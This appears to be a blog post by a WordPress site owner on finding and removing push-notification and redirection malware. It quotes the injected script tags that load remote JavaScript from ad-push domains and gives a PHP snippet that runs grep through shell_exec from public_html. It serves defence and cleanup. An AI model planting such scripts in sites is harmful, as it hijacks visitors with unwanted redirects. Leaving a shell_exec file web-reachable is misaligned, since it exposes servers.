What it looks like?
Recently our website Swarna, The Sagi Girl, also became a victim of this malware. And I had no clue what it was and how it is happening. For one month, I have ignored this and later it became an embarrassing moment when one of my visitors told me about it. But two days ago, I was finally able to get hold of this malware and removed it completely, from my server. Here’s how this push notification looks like. Click on the pictures to enlarge them.
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src="https://propu.sh/pfe/current/tag.min.js?z=3388595" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3388600" data-cfasync="false" async="async"></script>
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
How this Malware works?
How to fix unauthorized push notification and redirection malware from WordPress?
In my case, I remembered “inpagepush.com” so I searched with this on my server for files containing this string. Now if you are using shared hosting you might not have full SSH access and you might not be able to search. In order to solve the search issue you need to create a PHP file or file with .php extension with any name. I used find.php and put the below code in the file and saved it in your public_html folder.
<?php
$command = "grep -ri 'inpagepush' ./*";
$output = shell_exec($command);
echo "$output";
echo "Grep job over.";
?>




Also for additional security you can block all the URL’s present in the Ads to send and receive requests. After this incident I also changed my Database prefix.
Resources
I hope if you are victim of this malware then this post about how to Fix Unauthorized Push Notification and Redirection Malware on WordPress, helped you. Let us know your thoughts in the comments below.
